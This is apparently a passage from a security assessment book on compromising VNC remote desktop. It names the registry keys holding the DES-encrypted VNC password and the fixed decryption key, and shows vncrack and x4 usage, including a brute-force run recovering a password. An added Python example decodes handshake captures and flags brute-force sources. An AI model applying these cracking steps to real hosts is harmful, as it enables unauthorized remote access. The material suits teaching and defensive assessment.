AT&T's Virtual Network Computing (VNC) package is available from http://www.uk.research.att.com/vnc/. VNC is a free and simple remote desktop access system for Windows, and it runs over the following TCP ports:
Port 5800 for HTTP access to VNC using a Java client through a web browser
Port 5900 for direct access to VNC using the native vncviewer.exe
From a security perspective, VNC is relatively straightforward to compromise. A major issue with VNC security is its authentication mechanism, shown in Figure 7-3.
VNC requires only one piece of data for authentication purposes: a session password with a maximum length of eight characters. On the target server, the VNC password string is stored in the Windows registry under the following keys:
HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password
HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\Password
A fixed key encrypts the VNC password using DES, so if an attacker gains read access to the system registry across the network (often accessible on poorly protected Windows hosts) she can compromise the VNC session password. The fixed key is found in the VNC source code (0x238210763578887 at the time of writing).
vncrack by FX of Phenoelit is a Unix-based VNC cracking utility that's available from http://www.phenoelit.de/vncrack/. You can use vncrack to perform decryption of the VNC session password retrieved from the system registry, as well as active brute force against the VNC service over a network.
The VNC handshake can be sniffed, and the session password compromised using the Unix-based phoss network sniffing utility, available from Phenoelit at http://www.phenoelit.de/phoss/.
Example 7-17 shows the usage of the Unix-based vncrack utility.
# ./vncrack
VNCrack by Phenoelit (http://www.phenoelit.de/)
Usage:
Online: ./vncrack -h target.host.com -w wordlist.txt [-opt's]
Passwd: ./vncrack -C /home/some/user/.vnc/passwd
Windows interactive mode: ./vncrack -W
    enter hex key one byte per line - find it in
    \HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password or
    \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\Password
Options for online mode:
    -v      verbose
    -d N    Sleep N nanoseconds between each try
    -D N    Sleep N seconds between each try
    -a      Just a funny thing
    -p P    connect to port P instead of 5900
    -s N    Sleep N seconds in case connect() failed
Options for PHoss intercepted challenges:
    -c <challenge>  challenge from PHoss output
    -r <response>   response from PHoss output
By supplying the challenge and response captured by phoss (the -c and -r options), vncrack can also recover a sniffed session password instantly. Example 7-18 shows that the VNC session password for 192.168.189.120 is control after launching a brute-force attack.
# ./vncrack -h 192.168.189.120 -w common.txt
VNCrack - by Phenoelit (http://www.phenoelit.de/)
$Revision: 1.4 $
Server told me: connection close
Server told me: connection close
>>>>>>>>>>>>>>> Password: control >>>>>>>>>>>>>>>
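To make concrete what an on-path observer such as phoss actually sees in the exchange that vncrack's -c and -r options consume, here is an added Python example (not from the book or from Phenoelit) that decodes a constructed RFB 3.3 handshake capture and, going one step beyond the text, flags a source that accumulates repeated authentication failures, which is the server-side trace of a wordlist run like Example 7-18. The client address argument, the failure threshold and the sample byte streams are assumptions made for the example.

```python
import struct
from collections import Counter

# Security types and auth results carried in the RFB 3.3 handshake (the
# protocol version spoken by WinVNC 3.x); both travel in clear text.
SECURITY_TYPES = {0: "invalid", 1: "none", 2: "vnc-authentication"}
AUTH_RESULTS = {0: "ok", 1: "failed", 2: "too-many"}
VERSION = b"RFB 003.003\n"


def parse_rfb33_handshake(server_bytes, client_bytes, client_addr):
    """Decode one reassembled RFB 3.3 handshake (server->client and
    client->server streams) and report what a sniffer learns from it."""
    if not (server_bytes.startswith(VERSION) and client_bytes.startswith(VERSION)):
        raise ValueError("not an RFB 3.3 handshake")
    s, c = server_bytes[len(VERSION):], client_bytes[len(VERSION):]
    (sec_type,) = struct.unpack("!I", s[:4])
    info = {"client": client_addr, "version": "3.3",
            "security": SECURITY_TYPES.get(sec_type, "unknown")}
    if sec_type == 2:
        # 16-byte challenge, 16-byte DES response, then the 4-byte result:
        # everything needed to guess the 8-character password offline is on the wire.
        (result,) = struct.unpack("!I", s[20:24])
        info.update({"challenge": s[4:20].hex(), "response": c[:16].hex(),
                     "result": AUTH_RESULTS.get(result, "unknown"),
                     "exposed_to_offline_guessing": True})
    else:
        info["exposed_to_offline_guessing"] = False
    return info


def flag_bruteforce(handshakes, threshold=5):
    """Return client addresses with at least `threshold` failed VNC
    authentications across a batch of parsed handshakes."""
    failures = Counter(h["client"] for h in handshakes if h.get("result") == "failed")
    return sorted(src for src, n in failures.items() if n >= threshold)


# Constructed sample capture (not real traffic): one successfully
# VNC-authenticated session seen from the server and client sides.
SERVER_STREAM = VERSION + struct.pack("!I", 2) + bytes(range(16)) + struct.pack("!I", 0)
CLIENT_STREAM = VERSION + bytes(16)  # placeholder 16-byte response

if __name__ == "__main__":
    print(parse_rfb33_handshake(SERVER_STREAM, CLIENT_STREAM, "192.0.2.10"))
```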
The vncrack tool has also been ported and compiled for Win32 environments under the name x4. Example 7-19 shows the x4 command-line options.
D:\phenoelit> x4
VNCrackX4 by Phenoelit (http://www.phenoelit.de/)
Usage:
Online: ./vncrack -h target.host.com -w wordlist.txt [-opt's]
Windows interactive mode: ./vncrack -W
    enter hex key one byte per line - find it in
    \HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password or
    \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\Password
Options for online mode:
    -v      verbose (repeat -v for more)
    -p P    connect to port P instead of 5900
Options for PHoss intercepted challages:
    -c <challange>  challange from PHoss output
    -r <response>   response from PHoss output
If the Phenoelit site is down or no longer archives these tools, they are available at the following locations: